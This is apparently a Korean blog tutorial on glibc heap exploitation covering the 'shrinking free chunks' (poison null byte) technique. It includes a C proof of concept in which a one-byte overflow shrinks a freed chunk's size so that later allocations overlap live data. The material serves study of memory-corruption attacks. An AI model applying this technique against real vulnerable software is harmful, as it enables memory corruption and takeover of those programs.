Shrinking Free Chunks
이 공격은 'Glibc adventures : The forgotten chunk'에 설명되어 있다. 그것은 단일 바이트의 힙 오버플로우를 사용한다.
공격의 목표는 'malloc'이 현재 사용중인 이미 할당 된 청크와 겹치는 청크를 반환하도록하는 것이다.
먼저 3개의 연속 청크(a, b, c)가 할당되고 가운데 청크(b)가 free된 상태에서 1번째(a) chunk에서 overflow하여 2번째 청크(b)에 size 부분을 덮어쓰게 된다.
공격차는 최하위 바이트를 0으로 설정한다. 이 'shrinks'는 청크 사이즈를 줄인다. (b의 사이즈를 0x208 -> 0x200으로) 그 다음 2개의 작은 청크(b1, b2)가 free된 중간의 청크로부터 할당된다.
The third chunk's prev_size does not get updated as b + b->size no longer points to c. It, in fact, points to a memory region 'before' c.
그런 다음 c와 함께 b1이 free됩니다. c는 여전히 b가 free라고 가정합니다. (prev_size가 없데이트되지 않았기 때문에 c -> c -> prev_size가 여전히 b를 가리킴) 그리고 자신(c)을 b로 통합한다.
그 결과 b에서 시작하여 b2와 겹치는 큰 free chunk가 설정된다. 새로운 malloc은 이 큰 chunk를 반환하여 공격을 완료한다.
* unsortedbin은 FIFO! 인접한것이 오면 병합
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 | struct chunk_structure { size_t prev_size; size_t size; struct chunk_structure *fd; struct chunk_structure *bk; char buf[19]; // padding }; void *a, *b, *c, *b1, *b2, *big; struct chunk_structure *b_chunk, *c_chunk; // Grab three consecutive chunks in memory a = malloc(0x100); // at 0xfee010 b = malloc(0x200); // at 0xfee120 c = malloc(0x100); // at 0xfee330 b_chunk = (struct chunk_structure *)(b - 2*sizeof(size_t)); c_chunk = (struct chunk_structure *)(c - 2*sizeof(size_t)); // free b, now there is a large gap between 'a' and 'c' in memory // b will end up in unsorted bin free(b); // Attacker overflows 'a' and overwrites least significant byte of b's size // with 0x00. This will decrease b's size. *(char *)&b_chunk->size = 0x00; // Allocate another chunk // 'b' will be used to service this chunk. // c's previous size will not updated. In fact, the update will be done a few // bytes before c's previous size as b's size has decreased. // So, b + b->size is behind c. // c will assume that the previous chunk (c - c->prev_size = b/b1) is free b1 = malloc(0x80); // at 0xfee120 // Allocate another chunk // This will come directly after b1 b2 = malloc(0x80); // at 0xfee1b0 strcpy(b2, "victim's data"); // Free b1 free(b1); // Free c // This will now consolidate with b/b1 thereby merging b2 within it // This is because c's prev_in_use bit is still 0 and its previous size // points to b/b1 free(c); // Allocate a big chunk to cover b2's memory as well big = malloc(0x200); // at 0xfee120 memset(big, 0x41, 0x200 - 1); printf("%s\n", (char *)b2); // Prints AAAAAAAAAAA... ! | cs |
big은 초기 b청크를 가리키고 b2와 겹친다. 이 두 청크가 결코 free되지 않아도 big의 내용을 갱신하면 b2의 내용도 갱신된다.
b를 축소하는 대신 공격자는 b의 크기를 늘릴 수도 있다.
이경우 중복의 비슷한 케이스가 나타난다.
'malloc'이 증가된 크기의 다른 청크를 요청하면 b가 이 요청을 처리하는데 사용된다.
이제 c의 메모리도 이 새로운 청크의 일부가 될 것이다.
'Heap' 카테고리의 다른 글
| 13.House of spirit (0) | 2018.06.20 |
|---|---|
| 11.Unlink Exploit (0) | 2018.06.11 |
| 10.Forging chunks (0) | 2018.06.07 |
| 09.Double Free (0) | 2018.06.07 |
| 08.First-fit behavior (0) | 2018.06.06 |